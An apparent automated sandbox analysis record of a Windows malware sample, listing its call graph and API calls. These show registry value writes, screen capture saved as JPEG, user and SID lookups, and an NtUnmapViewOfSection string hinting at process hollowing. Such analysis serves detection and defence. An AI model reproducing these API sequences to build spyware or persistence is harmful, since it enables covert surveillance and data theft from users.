std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27345->27341 27345->27342 27346 2e630b 27346->27318 27348 2e6377 RegOpenKeyExA 27347->27348 27349 2e63a6 RegQueryValueExA 27348->27349 27350 2e63d0 RegCloseKey 27348->27350 27349->27350 27351 2e6400 27350->27351 27351->27351 27530 304640 27351->27530 27353 2e6480 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27356 309db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 27353->27356 27354 2e64a7 27357 30f419 25 API calls 27354->27357 27355 2e6418 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27355->27353 27355->27354 27358 2e64a3 27356->27358 27359 2e64ac RegOpenKeyExA 27357->27359 27358->27318 27361 2e64ed RegSetValueExA 27359->27361 27362 2e6517 RegCloseKey 27359->27362 27361->27362 27363 2e6528 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27362->27363 27364 2e65e6 27363->27364 27365 2e65ce std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27363->27365 27367 30f419 25 API calls 27364->27367 27366 309db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 27365->27366 27368 2e65e2 27366->27368 27369 2e65eb 27367->27369 27368->27318 27545 311f87 40 API calls 27369->27545 27371 2e661c RegOpenKeyExA 27372 2e6646 RegSetValueExA 27371->27372 27373 2e6665 RegCloseKey 27371->27373 27372->27373 27375 2e6676 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27373->27375 27374 2e6734 27378 30f419 25 API calls 27374->27378 27375->27374 27376 2e671c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27375->27376 27377 309db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 27376->27377 27379 2e6730 27377->27379 27380 2e6739 __wsopen_s 27378->27380 27379->27318 27381 303730 69 API calls 27380->27381 27382 2e67a0 27381->27382 27383 2e61f0 73 API calls 27382->27383 27384 2e67ab RegOpenKeyExA 27383->27384 27386 2e67d9 __fread_nolock std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27384->27386 27387 2e6d64 27386->27387 27388 2e6d80 27386->27388 27390 2e6829 RegQueryInfoKeyW 27386->27390 27389 309db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 27387->27389 27392 30f419 25 API calls 27388->27392 27391 2e6d7c 27389->27391 27394 2e6d58 RegCloseKey 27390->27394 27395 2e68a8 27390->27395 27391->27318 27393 2e6d85 GdiplusStartup 27392->27393 27396 2e6e39 27393->27396 27401 2e6e13 GetDC 27393->27401 27394->27387 27395->27394 27397 2e68b2 RegEnumValueA 27395->27397 27398 2e7534 27396->27398 27399 2e6e45 27396->27399 27425 2e68ee std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27397->27425 27565 2e26a0 26 API calls 2 library calls 27398->27565 27546 305ad0 26 API calls std::_Facet_Register 27399->27546 27408 303730 69 API calls 27401->27408 27402 2e7539 27403 30f419 25 API calls 27402->27403 27407 2e7552 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 27403->27407 27406 304640 26 API calls 27406->27425 27411 303730 69 API calls 27407->27411 27410 2e6f8b 27408->27410 27412 2e61f0 73 API calls 27410->27412 27413 2e7626 27411->27413 27414 2e6f96 27412->27414 27415 2e61f0 73 API calls 27413->27415 27416 303730 69 API calls 27414->27416 27417 2e7631 27415->27417 27418 2e6fb3 27416->27418 27566 2e2400 44 API calls 27417->27566 27419 2e61f0 73 API calls 27418->27419 27421 2e6fba 27419->27421 27422 303730 69 API calls 27421->27422 27424 2e6fcf 27422->27424 27423 303730 69 API calls 27423->27425 27426 2e61f0 73 API calls 27424->27426 27425->27388 27425->27394 27425->27397 27425->27406 27425->27423 27446 2e61f0 73 API calls 27425->27446 27427 2e6fd6 27426->27427 27434 303730 69 API calls 27427->27434 27428 2e7649 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27429 2e78c3 27428->27429 27431 303730 69 API calls 27428->27431 27430 30f419 25 API calls 27429->27430 27432 2e78c8 27430->27432 27433 2e76b2 27431->27433 27435 30f419 25 API calls 27432->27435 27436 2e61f0 73 API calls 27433->27436 27437 2e7002 27434->27437 27438 2e78cd 27435->27438 27441 2e76bd 27436->27441 27439 2e61f0 73 API calls 27437->27439 27440 30f419 25 API calls 27438->27440 27442 2e700d 27439->27442 27443 2e78d2 27440->27443 27567 2e2400 44 API calls 27441->27567 27547 305b30 27442->27547 27446->27425 27447 2e7024 27450 305b30 26 API calls 27447->27450 27448 2e771a GetSidSubAuthorityCount 27449 2e77d2 27448->27449 27471 2e7734 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27448->27471 27454 304640 26 API calls 27449->27454 27459 2e703b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27450->27459 27451 2e7740 GetSidSubAuthority 27453 303730 69 API calls 27451->27453 27452 2e76d7 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27452->27432 27452->27448 27453->27471 27456 2e7822 27454->27456 27455 2e61f0 73 API calls 27455->27471 27458 304640 26 API calls 27456->27458 27457 2e715f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27460 303730 69 API calls 27457->27460 27461 2e786f 27458->27461 27459->27402 27459->27457 27463 2e719f 27460->27463 27461->27438 27464 2e789b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27461->27464 27465 2e61f0 73 API calls 27463->27465 27466 309db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 27464->27466 27468 2e71aa 27465->27468 27467 2e78bf 27466->27467 27467->27318 27469 2e71b5 RegGetValueA 27468->27469 27470 2e71b3 27468->27470 27472 2e71e5 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27469->27472 27470->27469 27471->27429 27471->27449 27471->27451 27471->27455 27568 2e2400 44 API calls 27471->27568 27473 2e722f GetSystemMetrics 27472->27473 27474 2e7226 GetSystemMetrics 27472->27474 27476 2e7234 27473->27476 27475 2e722d 27474->27475 27474->27476 27475->27473 27477 303730 69 API calls 27476->27477 27478 2e724f 27477->27478 27479 2e61f0 73 API calls 27478->27479 27480 2e725a RegGetValueA 27479->27480 27486 2e728f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27480->27486 27482 2e72ca GetSystemMetrics 27484 2e72d8 6 API calls 27482->27484 27485 2e72d1 27482->27485 27483 2e72d3 GetSystemMetrics 27483->27484 27487 2e736b ___std_exception_copy 27484->27487 27488 2e73f8 6 API calls 27484->27488 27485->27483 27486->27482 27486->27483 27487->27488 27490 2e7380 GdipGetImageEncoders 27487->27490 27493 2e744f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27488->27493 27489 2e74e0 GdiplusShutdown 27491 2e74f1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27489->27491 27497 2e7394 27490->27497 27492 309db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 27491->27492 27494 2e7530 27492->27494 27493->27489 27494->27318 27496 2e73ef 27496->27488 27564 312241 14 API calls _free 27497->27564 27498->27329 27499->27330 27500->27329 27506 30f3a5 25 API calls 3 library calls 27501->27506 27503 30f428 27507 30f436 11 API calls __FrameHandler3::FrameUnwindToState 27503->27507 27505 30f435 27506->27503 27507->27505 27569 304500 26 API calls 3 library calls 27508->27569 27510 2e5dd1 27511 2e6060 27510->27511 27570 304500 26 API calls 3 library calls 27511->27570 27513 2e61c6 27516 2e51a0 27513->27516 27515 2e6095 27515->27513 27571 3107b0 40 API calls 2 library calls 27515->27571 27517 2e5432 27516->27517 27521 2e5204 27516->27521 27517->27345 27519 2e5355 27519->27517 27574 305610 26 API calls 3 library calls 27519->27574 27521->27519 27572 3107b0 40 API calls 2 library calls 27521->27572 27573 305610 26 API calls 3 library calls 27521->27573 27524 309db8 27523->27524 27525 309db9 IsProcessorFeaturePresent 27523->27525 27524->27346 27527 309fe8 27525->27527 27575 309fa8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27527->27575 27529 30a0cb 27529->27346 27533 30465e _Yarn 27530->27533 27535 304684 27530->27535 27531 30476e 27578 2e26a0 26 API calls 2 library calls 27531->27578 27533->27355 27534 304773 27579 2e25c0 26 API calls 3 library calls 27534->27579 27535->27531 27537 3046d8 27535->27537 27538 3046fd 27535->27538 27537->27534 27576 2e25c0 26 API calls 3 library calls 27537->27576 27543 3046e9 _Yarn 27538->27543 27577 2e25c0 26 API calls 3 library calls 27538->27577 27539 304778 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27539->27355 27542 30f419 25 API calls 27542->27531 27543->27542 27544 304750 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27543->27544 27544->27355 27545->27371 27546->27401 27548 305b73 27547->27548 27549 305d00 27548->27549 27550 305c40 27548->27550 27557 305b78 _Yarn 27548->27557 27582 2e26a0 26 API calls 2 library calls 27549->27582 27554 305c75 27550->27554 27555 305c9b 27550->27555 27552 305d05 27583 2e25c0 26 API calls 3 library calls 27552->27583 27554->27552 27558 305c80 27554->27558 27563 305c8d _Yarn 27555->27563 27581 2e25c0 26 API calls 3 library calls 27555->27581 27556 305c86 27561 30f419 25 API calls 27556->27561 27556->27563 27557->27447 27580 2e25c0 26 API calls 3 library calls 27558->27580 27562 305d0f 27561->27562 27563->27447 27564->27496 27565->27402 27566->27428 27567->27452 27568->27471 27569->27510 27570->27515 27571->27515 27572->27521 27573->27521 27574->27519 27575->27529 27576->27543 27577->27543 27578->27534 27579->27539 27580->27556 27581->27563 27582->27552 27583->27556 27585 30e1fa 27584->27585 27586 30e20c 27584->27586 27612 30a9b5 GetModuleHandleW 27585->27612 27596 30e093 27586->27596 27589 30e1ff 27589->27586 27613 30e292 GetModuleHandleExW 27589->27613 27591 30a6a1 27591->27309 27595 30e24f 27597 30e09f __FrameHandler3::FrameUnwindToState 27596->27597 27619 312ae0 EnterCriticalSection 27597->27619 27599 30e0a9 27620 30e0ff 27599->27620 27601 30e0b6 27624 30e0d4 27601->27624 27604 30e250 27629 3166e2 GetPEB 27604->27629 27607 30e27f 27610 30e292 __FrameHandler3::FrameUnwindToState 3 API calls 27607->27610 27608 30e25f GetPEB 27608->27607 27609 30e26f GetCurrentProcess TerminateProcess 27608->27609 27609->27607 27611 30e287 ExitProcess 27610->27611 27612->27589 27614 30e2b1 GetProcAddress 27613->27614 27615 30e2d4 27613->27615 27616 30e2c6 27614->27616 27617 30e20b 27615->27617 27618 30e2da FreeLibrary 27615->27618 27616->27615 27617->27586 27618->27617 27619->27599 27621 30e10b __FrameHandler3::FrameUnwindToState 27620->27621 27622 30e16c __FrameHandler3::FrameUnwindToState 27621->27622 27627 3149f3 14 API calls __FrameHandler3::FrameUnwindToState 27621->27627 27622->27601 27628 312b28 LeaveCriticalSection 27624->27628 27626 30e0c2 27626->27591 27626->27604 27627->27622 27628->27626 27630 30e25a 27629->27630 27631 3166fc 27629->27631 27630->27607 27630->27608 27633 318bbf 5 API calls std::_Lockit::_Lockit 27631->27633 27633->27630 27634 2ee8d0 GetUserNameA 27635 2ee951 27634->27635 27635->27635 27636 304640 26 API calls 27635->27636 27637 2ee96d 27636->27637 27673 306660 27637->27673 27639 2ee9d8 27690 306a00 27639->27690 27641 2ee9f2 27642 306660 93 API calls 27641->27642 27643 2eea60 27642->27643 27644 306a00 26 API calls 27643->27644 27645 2eea7a 27644->27645 27646 303730 69 API calls 27645->27646 27647 2eeaa7 27646->27647 27648 306660 93 API calls 27647->27648 27649 2eeb10 27648->27649 27650 306a00 26 API calls 27649->27650 27651 2eeb2a 27650->27651 27652 306660 93 API calls 27651->27652 27653 2eeb98 27652->27653 27654 306a00 26 API calls 27653->27654 27655 2eebb2 27654->27655 27656 306660 93 API calls 27655->27656 27657 2eec20 27656->27657 27658 306a00 26 API calls 27657->27658 27659 2eec3a CoInitialize 27658->27659 27660 2eec87 27659->27660 27661 2ef465 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27660->27661 27663 2ef48d 27660->27663 27662 309db0 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 27661->27662 27664 2ef489 27662->27664 27665 30f419 25 API calls 27663->27665 27666 2ef492 27665->27666 27667 30f419 25 API calls 27666->27667 27668 2ef497 27667->27668 27669 30f419 25 API calls 27668->27669 27670 2ef49c 27669->27670 27671 30f419 25 API calls 27670->27671 27672 2ef4a1 27671->27672 27674 30667b 27673->27674 27688 306734 _Yarn std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27673->27688 27675 3067d3 27674->27675 27678 3066e9 _Yarn 27674->27678 27674->27688 27699 305ad0 26 API calls std::_Facet_Register 27674->27699 27700 2e26a0 26 API calls 2 library calls 27675->27700 27677 3067d8 27679 30681e 27677->27679 27680 30687f 27677->27680 27686 30f419 25 API calls 27678->27686 27678->27688 27701 2e3a60 91 API calls __Mtx_unlock 27679->27701 27703 2e32b0 26 API calls 2 library calls 27680->27703 27684 306823 27702 306890 EnterCriticalSection LeaveCriticalSection __Cnd_destroy_in_situ __Mtx_destroy_in_situ 27684->27702 27685 306884 27686->27675 27688->27639 27689 306855 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27689->27639 27691 306b60 27690->27691 27698 306a40 _Yarn std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27690->27698 27691->27641 27692 306b74 27705 2e26a0 26 API calls 2 library calls 27692->27705 27694 306b79 27695 30f419 25 API calls 27694->27695 27697 306b7e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 27695->27697 27697->27641 27698->27691 27698->27692 27698->27694 27704 305ad0 26 API calls std::_Facet_Register 27698->27704 27699->27678 27700->27677 27701->27684 27702->27689 27703->27685 27704->27698 27705->27694
                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,AA6E0749,AA6E0749), ref: 002E639C
                                                                • RegQueryValueExA.KERNELBASE(AA6E0749,?,00000000,00000000,?,00000400,?,?,00000000,00000001,AA6E0749,AA6E0749), ref: 002E63CA
                                                                • RegCloseKey.KERNELBASE(AA6E0749,?,?,00000000,00000001,AA6E0749,AA6E0749), ref: 002E63D6
                                                                • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 002E64E3
                                                                • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 002E6511
                                                                • RegCloseKey.ADVAPI32(80000001), ref: 002E651A
                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 002E663C
                                                                • RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 002E665F
                                                                  • Part of subcall function 002E61F0: RegOpenKeyExA.ADVAPI32(?,00000000), ref: 002E67BD
                                                                  • Part of subcall function 002E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 002E6894
                                                                  • Part of subcall function 002E61F0: RegEnumValueA.ADVAPI32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 002E68E0
                                                                • RegCloseKey.ADVAPI32(80000002), ref: 002E6668
                                                                • RegCloseKey.ADVAPI32(?), ref: 002E6D5E
                                                                • GdiplusStartup.GDIPLUS(?,?,00000000,AA6E0749,00000000), ref: 002E6DEA
                                                                • GetDC.USER32(00000000), ref: 002E6F62
                                                                • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 002E71CD
                                                                • GetSystemMetrics.USER32(00000000), ref: 002E7226
                                                                • GetSystemMetrics.USER32(00000000), ref: 002E722F
                                                                • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 002E7277
                                                                • GetSystemMetrics.USER32(00000001), ref: 002E72CA
                                                                • GetSystemMetrics.USER32(00000001), ref: 002E72D3
                                                                • CreateCompatibleDC.GDI32(?), ref: 002E72DF
                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 002E72F4
                                                                • SelectObject.GDI32(00000000,00000000), ref: 002E7304
                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 002E732A
                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 002E733E
                                                                • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 002E735A
                                                                • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 002E7387
                                                                • GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 002E740E
                                                                • SelectObject.GDI32(00000000,?), ref: 002E741B
                                                                • DeleteObject.GDI32(00000000), ref: 002E7428
                                                                • DeleteObject.GDI32(?), ref: 002E7430
                                                                • ReleaseDC.USER32(00000000,?), ref: 002E743A
                                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 002E7441
                                                                • GdiplusShutdown.GDIPLUS(?), ref: 002E74E3
                                                                • GetUserNameA.ADVAPI32(?,?), ref: 002E75BA
                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 002E7600
                                                                • GetSidIdentifierAuthority.ADVAPI32(?), ref: 002E760D
                                                                • GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002E7721
                                                                • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 002E7748
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
                                                                • String ID: $($NtUnmapViewOfSection$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                                • API String ID: 1729688432-36074161
                                                                • Opcode ID: 2224e40933b5c0a1ba4769a3c1330d861eba33eba85296fc4535f9c0dcdd3c12
                                                                • Instruction ID: f4c79e4a3db721b159f3bfb4492d1413b11e4411c8cb5561c3a5e24a8c6a8bfa
                                                                • Opcode Fuzzy Hash: 2224e40933b5c0a1ba4769a3c1330d861eba33eba85296fc4535f9c0dcdd3c12
                                                                • Instruction Fuzzy Hash: 9FD21471A101589BDB19DF29CC89BEDBB79EF45300F904298E409EB2D2DB749AD0CF91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 754 30e250-30e25d call 3166e2 757 30e27f-30e28b call 30e292 ExitProcess 754->757 758 30e25f-30e26d GetPEB 754->758 758->757 759 30e26f-30e279 GetCurrentProcess TerminateProcess 758->759 759->757
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(?,?,0030E24F,?,?,?,?,?,0030F4C2), ref: 0030E272
                                                                • TerminateProcess.KERNEL32(00000000,?,0030E24F,?,?,?,?,?,0030F4C2), ref: 0030E279
                                                                • ExitProcess.KERNEL32 ref: 0030E28B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: cf4ae6b03fbf08a811e6e0229a0068290439a1aec0600956529b8761771a6bf5
                                                                • Instruction ID: 71c5f65534acc4dc1a81505a58721fc7e244f9752bd296ca354d74fd285e110c
                                                                • Opcode Fuzzy Hash: cf4ae6b03fbf08a811e6e0229a0068290439a1aec0600956529b8761771a6bf5
                                                                • Instruction Fuzzy Hash: 00E0B631201208AFCF137BA8DD5994E3B6DEB54781F118C14F805CA171CB35DD91EA40

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 445 323e8f-323ebf call 323bdd 448 323ec1-323ecc call 31163f 445->448 449 323eda-323ee6 call 31a755 445->449 456 323ece-323ed5 call 311652 448->456 454 323ee8-323efd call 31163f call 311652 449->454 455 323eff-323f48 call 323b48 449->455 454->456 464 323fb5-323fbe GetFileType 455->464 465 323f4a-323f53 455->465 466 3241b4-3241b8 456->466 467 323fc0-323ff1 GetLastError call 31161c CloseHandle 464->467 468 324007-32400a 464->468 470 323f55-323f59 465->470 471 323f8a-323fb0 GetLastError call 31161c 465->471 467->456 482 323ff7-324002 call 311652 467->482 473 324013-324019 468->473 474 32400c-324011 468->474 470->471 475 323f5b-323f88 call 323b48 470->475 471->456 479 32401d-32406b call 31a6a0 473->479 480 32401b 473->480 474->479 475->464 475->471 488 32408a-3240b2 call 3238f5 479->488 489 32406d-324079 call 323d57 479->489 480->479 482->456 495 3240b7-3240f8 488->495 496 3240b4-3240b5 488->496 489->488 494 32407b 489->494 497 32407d-324085 call 3186f9 494->497 498 3240fa-3240fe 495->498 499 324119-324127 495->499 496->497 497->466 498->499 501 324100-324114 498->501 502 3241b2 499->502 503 32412d-324131 499->503 501->499 502->466 503->502 505 324133-324166 CloseHandle call 323b48 503->505 508 32419a-3241ae 505->508 509 324168-324194 GetLastError call 31161c call 31a868 505->509 508->502 509->508
                                                                APIs
                                                                  • Part of subcall function 00323B48: CreateFileW.KERNELBASE(00000000,00000000,?,00323F38,?,?,00000000,?,00323F38,00000000,0000000C), ref: 00323B65
                                                                • GetLastError.KERNEL32 ref: 00323FA3
                                                                • __dosmaperr.LIBCMT ref: 00323FAA
                                                                • GetFileType.KERNELBASE(00000000), ref: 00323FB6
                                                                • GetLastError.KERNEL32 ref: 00323FC0
                                                                • __dosmaperr.LIBCMT ref: 00323FC9
                                                                • CloseHandle.KERNEL32(00000000), ref: 00323FE9
                                                                • CloseHandle.KERNEL32(?), ref: 00324136
                                                                • GetLastError.KERNEL32 ref: 00324168
                                                                • __dosmaperr.LIBCMT ref: 0032416F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID:
                                                                • API String ID: 4237864984-0
                                                                • Opcode ID: e16734b81dbcc4d910f77522ceebfbe4aecda95ffcffbe6d3f2edfbdd3f56072
                                                                • Instruction ID: 1b5f9dc3beffe8e7d79fd8ae2ebea2bc4a4f83be1d26b6851a64160b53241d53
                                                                • Opcode Fuzzy Hash: e16734b81dbcc4d910f77522ceebfbe4aecda95ffcffbe6d3f2edfbdd3f56072
                                                                • Instruction Fuzzy Hash: 11A16732A001648FCF1F9F68EC517EE3BA5AB0A320F190149F815EF2A1CB399D56CB51

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 514 2e89e0-2e8a31 Sleep 515 2e8abe-2e8b34 call 304640 * 3 CreateThread Sleep 514->515 516 2e8a37-2e8a4b call 309ed2 514->516 530 2e8b36-2e8b42 515->530 531 2e8b62-2e8b7a 515->531 516->515 522 2e8a4d-2e8abb call 30a414 call 309e88 516->522 522->515 532 2e8b58-2e8b5f call 30a429 530->532 533 2e8b44-2e8b52 530->533 534 2e8b7c-2e8b88 531->534 535 2e8ba4-2e8bbc 531->535 532->531 533->532 538 2e8bf8-2e8c3e call 30f419 533->538 540 2e8b9a-2e8ba1 call 30a429 534->540 541 2e8b8a-2e8b98 534->541 536 2e8bbe-2e8bca 535->536 537 2e8be6-2e8bf7 535->537 543 2e8bdc-2e8be3 call 30a429 536->543 544 2e8bcc-2e8bda 536->544 552 2e8c44-2e8c84 call 305d10 call 304ce0 538->552 553 2e8df1 call 2e26a0 538->553 540->535 541->538 541->540 543->537 544->538 544->543 562 2e8c86-2e8c92 552->562 563 2e8cb2-2e8d34 call 303730 * 2 call 2e61f0 call 304640 call 2e8700 552->563 557 2e8df6 call 30f419 553->557 561 2e8dfb-2e8eca call 30f419 call 303730 call 2e61f0 call 304ce0 call 303730 call 2e61f0 call 304640 call 2e8700 557->561 614 2e8ecc-2e8ed8 561->614 615 2e8ef4-2e8f05 Sleep 561->615 565 2e8ca8-2e8caf call 30a429 562->565 566 2e8c94-2e8ca2 562->566 589 2e8d36-2e8d42 563->589 590 2e8d62-2e8d68 563->590 565->563 566->557 566->565 592 2e8d58-2e8d5f call 30a429 589->592 593 2e8d44-2e8d52 589->593 595 2e8d6a-2e8d76 590->595 596 2e8d92-2e8daa 590->596 592->590 593->561 593->592 599 2e8d88-2e8d8f call 30a429 595->599 600 2e8d78-2e8d86 595->600 601 2e8dac-2e8db8 596->601 602 2e8dd4-2e8df0 call 309db0 596->602 599->596 600->561 600->599 603 2e8dca-2e8dd1 call 30a429 601->603 604 2e8dba-2e8dc8 601->604 603->602 604->561 604->603 618 2e8eea-2e8ef1 call 30a429 614->618 619 2e8eda-2e8ee8 614->619 616 2e8f2f-2e8f3e 615->616 617 2e8f07-2e8f13 615->617 620 2e8f25-2e8f2c call 30a429 617->620 621 2e8f15-2e8f23 617->621 618->615 619->618 622 2e8f3f call 30f419 619->622 620->616 621->620 625 2e8f44-2e8f9d call 30f419 call 2e7d20 621->625 622->625 633 2e8f9f 625->633 634 2e8fa1-2e8fae SetCurrentDirectoryA 625->634 633->634 635 2e8fdc-2e909d call 303730 call 2e61f0 call 303730 call 2e61f0 call 304ce0 call 305b30 call 303730 call 2e61f0 call 304640 call 2e8700 634->635 636 2e8fb0-2e8fbc 634->636 668 2e909f-2e90ab 635->668 669 2e90cb-2e90e3 635->669 637 2e8fbe-2e8fcc 636->637 638 2e8fd2-2e8fd9 call 30a429 636->638 637->638 640 2e9194 call 30f419 637->640 638->635 646 2e9199 call 30f419 640->646 650 2e919e-2e91a3 call 30f419 646->650 672 2e90ad-2e90bb 668->672 673 2e90c1-2e90c8 call 30a429 668->673 670 2e90e5-2e90f1 669->670 671 2e9111-2e9129 669->671 674 2e9107-2e910e call 30a429 670->674 675 2e90f3-2e9101 670->675 676 2e912b-2e9137 671->676 677 2e9153-2e9159 671->677 672->646 672->673 673->669 674->671 675->646 675->674 680 2e9149-2e9150 call 30a429 676->680 681 2e9139-2e9147 676->681 682 2e915b-2e9167 677->682 683 2e9183-2e9193 677->683 680->677 681->646 681->680 687 2e9179-2e9180 call 30a429 682->687 688 2e9169-2e9177 682->688 687->683 688->650 688->687
                                                                APIs
                                                                • Sleep.KERNEL32(00000064,AA6E0749,?,00000000,003294DD,000000FF), ref: 002E8A1C
                                                                • __Init_thread_footer.LIBCMT ref: 002E8AB6
                                                                  • Part of subcall function 00309E88: EnterCriticalSection.KERNEL32(00348FA8,?,?,002E2E3C,0034CDC4,0032D0C0), ref: 00309E92
                                                                  • Part of subcall function 00309E88: LeaveCriticalSection.KERNEL32(00348FA8,?,?,002E2E3C,0034CDC4,0032D0C0), ref: 00309EC5
                                                                  • Part of subcall function 00309E88: WakeAllConditionVariable.KERNEL32(?,002E2E3C,0034CDC4,0032D0C0), ref: 00309F3C
                                                                • CreateThread.KERNEL32(00000000,00000000,002E8880,0034C578,00000000,00000000), ref: 002E8B1B
                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002E8B26
                                                                  • Part of subcall function 00309ED2: EnterCriticalSection.KERNEL32(00348FA8,?,?,?,002E2E1C,0034CDC4), ref: 00309EDD
                                                                  • Part of subcall function 00309ED2: LeaveCriticalSection.KERNEL32(00348FA8,?,?,?,002E2E1C,0034CDC4), ref: 00309F1A
                                                                • Sleep.KERNEL32(000003E8), ref: 002E8EF9
                                                                  • Part of subcall function 002E26A0: ___std_exception_copy.LIBVCRUNTIME ref: 002E26E2
